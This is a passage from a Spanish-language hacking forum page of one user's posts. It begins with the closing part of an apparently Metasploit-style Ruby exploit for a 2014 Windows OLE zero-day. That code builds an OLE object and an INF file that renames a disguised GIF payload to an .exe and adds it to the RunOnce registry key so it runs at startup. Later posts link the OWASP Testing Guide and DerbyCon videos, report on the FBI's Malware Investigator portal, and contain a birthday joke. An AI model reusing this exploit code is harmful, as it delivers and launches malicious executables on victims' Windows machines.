  195.         clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
  196.         entry.instance_variable_set(:@_clsId, clsid)
  197.       end
  198.     end
  199.  
  200.     # write to disk
  201.     stg.close
  202.  
  203.     ole_contents = File.read(ole_tmp.path)
  204.     ole_tmp.close
  205.     ole_tmp.unlink
  206.  
  207.     ole_contents
  208.   end
  209.  
  210.   def inf_file(gif_name)
  211.     inf = <<-EOF
  212. ; 61883.INF
  213. ; Copyright (c) Microsoft Corporation.  All rights reserved.
  214.  
  215. [Version]
  216. Signature = "$CHICAGO$"
  217. Class=61883
  218. ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
  219. Provider=%Msft%
  220. DriverVer=06/21/2006,6.1.7600.16385
  221.  
  222. [DestinationDirs]
  223. DefaultDestDir = 1
  224.  
  225. [DefaultInstall]
  226. RenFiles = RxRename
  227. AddReg = RxStart
  228.  
  229. [RxRename]
  230. #{gif_name}.exe, #{gif_name}
  231. [RxStart]#
  232. HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
  233. EOF
  234.  
  235.     inf
  236.   end
  237.  
  238. end

Fuente:

http://1337day.com/exploit/22769
http://www.welivesecurity.com/la-es/2014/10/22/nueva-vulnerabilidad-0-day-afecta-versiones-windows/

17
Hacking / OWASP Testing Guide
« en: Octubre 21, 2014, 10:40:00 pm »

El marco de trabajo descrito en este documento pretende alentar a las personas a evaluar y tomar una medida de la seguridad a través de todo el proceso de desarrollo. Así, pueden relacionar los costes de un software inseguro al impacto que tiene en su negocio, y de este modo gestionar decisiones de negocio apropiadas (recursos) para la gestión del riesgo.

El software inseguro tiene de por si sus consecuencias, pero las aplicaciones web inseguras, expuestas a millones de usuarios a través de Internet, representan una inquietud creciente. Incluso a día de hoy, la confianza de los clientes que usan la Web para realizar sus compras o cubrir sus necesidades de información está decreciendo, a medida que más y más aplicaciones web se ven expuestas a ataques.

Han pasado ya 6 años desde la última versión estable de la Guía de pruebas OWASP, la v3.

PDF:

https://www.owasp.org/images/1/19/OTGv4.pdf

Wiki del proyecto

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

18
Hacking / Derbycon
« en: Octubre 02, 2014, 10:06:31 pm »

Derbycon es la nueva conferencia hacker que se realiza en Louisville, Kentucky durante la ultima semana de septiembre, la primera derbycon se realizo en el 2011 con más de 1,100 asistentes, este año se realizo la numero 4.

Pueden ver los videos de las conferencias en los siguientes enlaces, donde se pueden encontrar cosas muy interesantes como Bypassing Internet Explorer's XSS Filter,  Abusing Active Directory in Post-Exploitation, conferencias de la mano de Kevin Mitnick, HD moore... etc.

DerbyCon 1.

http://www.irongeek.com/i.php?page=videos/derbycon1/mainlist

DerbyCon 2.

http://www.irongeek.com/i.php?page=videos/derbycon2/mainlist

DerbyCon 3.

http://www.irongeek.com/i.php?page=videos/derbycon3/mainlist

DerbyCon 4.

http://www.irongeek.com/i.php?page=videos/derbycon4/mainlist

19
El Buró Federal de Investigación (FBI por sus siglas en inglés) de los Estados Unidos anunció que su herramienta de análisis de malware pronto estará disponible para organizaciones sin fines de lucro y empresas privadas a través de un portal web.


Jonathan Burns, agente del FBI, quien trabaja en operaciones contra el cibercimen, presentó las capacidades de la herramienta Malware Investigator hace unos días en el marco de la conferencia Virus Bulletin.

El portal, lanzado en agosto, ofrece el análisis automático de archivios enviados por los usuarios y provee los siguientes tipos de pruebas y resultados:
Hashes de archivos (MD5, SHA-1, SHA-256, SSDEEP)
Correlación
Comparación de malware (análisis por similaridad)
Fuzzy Hashing
Section Hashing
Cluster para el escaneo de virus
Sandbox (PE32 exe, PDF, documentos de MS Office)
Modificación del sistema de archivos
Procesos
Modificaciones en el registro
Intentos de conexiones de red
Otros (escritura del archivo, importación de funciones, comportamiento sobre el tiempo)
Cadenas

De acuerdo al sitio web, "Malware Investigator es una herramienta que ofrece a los usuarios la habilidad de enviar un archivo sospechoso de ser malware y, en menos de una hora, recibir información técnica detallada sobre lo que el malware hace y cuál podría ser su objetivo."

La información proporcionada permite a los investigadores y especialistas en seguridad reaccionar rápido ante ataques que involucren malware.

Actualmente, la herramienta sólo puede analizar archivos ejecutables para Windows, archivos PDF y otros tipos de archivos comunes. De acuerdo al sitio ThreatPost, el FBI tiene planeado expandir la lista de archivos que pueden analizarse con la herramienta para incluir archivos de Android y otros sistemas operativos.

Dentro de la estrategia del FBI para brindar acceso a diferentes entidades no gubernamentales, también se incluye la liberación de la API de la herramienta para que las compañías interesadas puedan integrar la aplicación con sus sistemas actuales.

Permitir el acceso a la herramienta Malware Investigator al sector privado, a investigadores de seguridad, al sector académico y a otras organizaciones sin fines de lucro, es un gran movimiento del FBI por varias razones, entre las que se incluyen la ayuda a la comunidad en general en la lucha contra el malware, además de la posibilidad de recolectar muestras de malware que de otra forma sería difícil o tardado conseguir para el FBI

20
Off Topic / Feliz cumpleaños Snifer!
« en: Septiembre 20, 2014, 11:06:16 pm »

Perra!!!!!  ;D Te voy adelantar las felicitaciones ya que mañana andas de cumpleañera; en nombre de la Comunidad Troll te deseo un feliz cumple perra que te la pases de lo mejor y lo mas importarte que disfrutes el #FBFriendlyLogout Jajajajajaja PD: maldito no puedo ingresar

En fin disfruta tu cumple crack :-*

PD: Todo aquel que tenga ganas de trolear a la cumpleañera entrar a este enlace de facebook.... Saludos.


Páginas: [1] 2 3 ... 7